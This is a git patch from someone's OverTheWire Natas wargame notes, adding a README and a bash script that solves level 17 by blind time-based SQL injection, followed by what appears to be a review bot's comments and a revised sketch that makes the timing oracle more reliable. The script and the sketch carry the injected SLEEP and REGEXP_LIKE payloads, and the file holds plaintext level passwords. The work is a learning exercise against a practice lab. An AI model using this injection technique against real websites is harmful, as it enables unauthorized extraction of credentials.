From fb07d1005a92e602b66711b961b38e9c9f45604a Mon Sep 17 00:00:00 2001
From: Emile Clark-Boman
Date: Tue, 15 Jul 2025 22:52:15 +1000
Subject: [PATCH] +README.md

---
 overthewire/natas/README.md | 8 +++
 overthewire/natas/passwords.md | 111 +++++++++++++++++++++++++++++++++
 2 files changed, 119 insertions(+)
 create mode 100644 overthewire/natas/README.md

diff --git a/overthewire/natas/README.md b/overthewire/natas/README.md
new file mode 100644
index 0000000..7670def
--- /dev/null
+++ b/overthewire/natas/README.md
@@ -0,0 +1,8 @@
+## Natas
+If you're reading this then probably don't. These scripts are inefficient,
+written entirely for my learning, and not designed to teach anyone.
+> **Note to Self:** All the solutions are written in bash even though its
+> incredibly inefficient for these questions. Simply because I need to
+> improve my ability to use bash for complex scripts so yeah!!
+
+
diff --git a/overthewire/natas/passwords.md b/overthewire/natas/passwords.md
index b6a8f71..c3cd1ec 100644
--- a/overthewire/natas/passwords.md
+++ b/overthewire/natas/passwords.md
@@ -1,3 +1,4 @@
+### Passwords + Methodology natas0: natas0 natas1: 0nzCigAq7t2iALyvU9xcHlYN4MlkIwlq View source
@@ -279,4 +280,114 @@ done echo ```
+###### Natas17 Solution Script
+```bash
+#!/usr/bin/env bash
+USERNAME="natas17"
+PASSWORD="EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC"
+TARGET="natas18"
+
+DELAY=4
+PREFIX="5mxv8BZZVSMzzYPcY95M9m"
+
+req() {
+ CMD=$@
+ curl "http://$USERNAME.natas.labs.overthewire.org/index.php" \
+ -X POST \
+ -u "$USERNAME:$PASSWORD" \
+ -d "username=natas18\" AND $CMD AND SLEEP($DELAY) # " \
+ -sS &>/dev/null
+}
+
+time_req() (
+ export STAT
+ export CMD="$@"
+ (time (req $CMD; STAT=$?)) \
+ |& grep real \
+ | awk '{print substr($2, 3, 1)}'
+ return $STAT
+)
+
+# ie `guess_length "=32"` or `guess_length ">32"`
+guess_length() {
+ ELAPSED=$(time_req "LENGTH(password)$1")
+ return $(( ELAPSED < DELAY ))
+}
+
+get_length() {
+ echo "[*] Guessing length"
+ local MIN=${1:-1}
+ local MAX=${2:-100}
+ # local PADMAX=${#MAX}
+ local FGUESS="%${#MAX}s-%-${#MAX}s"
+ while true; do
+ printf "[-] Guess: $FGUESS\r" $MIN $MAX
+ if [ $((MAX-MIN)) -eq 1 ]; then
+ break
+ fi;
+
+ local MID=$(( (MAX+MIN)/2 ))
+ guess_length ">$MID" && MIN=$MID || MAX=$MID
+ done
+ printf "[+] Found: $FGUESS\n" $MIN $MAX
+ return $MAX
+}
+
+LOWER="abcdefghijklmnopqrstuvwxyz"
+UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+DIGIT="0123456789"
+
+guess_regex() {
+ ELAPSED=$(time_req "REGEXP_LIKE(password, '^$1[a-zA-Z0-9]*\$', 'c')")
+ return $(( ELAPSED < DELAY ))
+}
+
+exploit_oracle() {
+ echo "[@] Forcing oracle exploit"
+ local PREFIX=""
+ local LENGTH=$1
+
+ while true; do
+ if [ "${#PREFIX}" = "$LENGTH" ]; then
+ break
+ fi
+
+ for chars in $LOWER $UPPER $DIGIT; do
+ local MIN=1
+ local MAX=${#chars}
+
+ local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]"
+ echo -en "[*] ?? 
$RANGE\r"
+ guess_regex "$PREFIX$RANGE$POSTFIX" || continue
+ echo "[+] Found[CHARSET]: $chars"
+
+ local MID=$(( (MAX+MIN)/2 ))
+ while true; do
+ echo -en "[*] Guess: $RANGE\r"
+ if [ $((MAX-MIN)) -eq 1 ]; then
+ local NEWCHAR
+ if guess_regex "$PREFIX${chars:MIN-1:1}"; then
+ NEWCHAR=${chars:MIN-1:1}
+ else
+ NEWCHAR=${chars:MAX-1:1}
+ fi
+ PREFIX="$PREFIX$NEWCHAR"
+ echo -e "[+] Update: $NEWCHAR -> $PREFIX"
+ break
+ fi;
+
+ MID=$(( (MAX+MIN)/2 ))
+ RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]"
+ guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID
+ done
+ break
+ done
+ done
+ printf "[+] Found: $FGUESS\n" $MIN $MAX
+}
+
+get_length
+LENGTH=$?
+exploit_oracle "$LENGTH"
+```
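Review bot: The timing oracle in `time_req`, `guess_length` and `guess_regex` turns every failed or mis-parsed measurement into "condition false": `awk '{print substr($2, 3, 1)}'` keeps only the seconds digit of `real` (`0m4.012s` → `4`), so a response of 10 s or more reads as `1`, and a curl transport error leaves `ELAPSED` empty, which `$(( ELAPSED < DELAY ))` evaluates as `0 < 4`. For a blind time-based extraction that is not a crash but a silently wrong branch of the binary search, so the recovered password can be corrupted with no indication; `STAT=$?` is also assigned inside the `(time (...))` subshell, so the exported `STAT` is never set and `return $STAT` is effectively the pipeline's status. Letting curl report its own elapsed time with `-w '%{time_total}'` removes the `time`/`grep`/`awk` parsing and lets the callers abort on a non-zero status instead of computing on an empty value, as sketched below. Separately, `-u "$USERNAME:$PASSWORD"` puts the level password on curl's argv, which on most systems other local users can read via `ps`; `--netrc` or `-u "$USERNAME"` with the password read from stdin avoids that. The whole fenced script lies inside this hunk.
```shell
req() {
  # Let curl report elapsed wall-clock seconds itself; stdout carries only the timing.
  curl "http://$USERNAME.natas.labs.overthewire.org/index.php" \
    -X POST \
    -u "$USERNAME:$PASSWORD" \
    -d "username=natas18\" AND $* AND SLEEP($DELAY) # " \
    -s -o /dev/null -w '%{time_total}\n'
}

time_req() {
  local elapsed
  # A transport failure now surfaces as a non-zero status instead of an empty ELAPSED.
  elapsed=$(req "$@") || return 1
  # Whole seconds; unlike substr($2,3,1) on "0m4.012s" this still works past 9 s.
  printf '%s\n' "${elapsed%%.*}"
}

guess_length() {
  # Abort rather than let an unusable measurement steer the search.
  ELAPSED=$(time_req "LENGTH(password)$1") || { echo "[!] request failed" >&2; exit 1; }
  return $(( ELAPSED < DELAY ))
}
# … unchanged: get_length, charsets … (apply the same `|| { ...; exit 1; }` in guess_regex)
# … unchanged: exploit_oracle and the top-level calls …
```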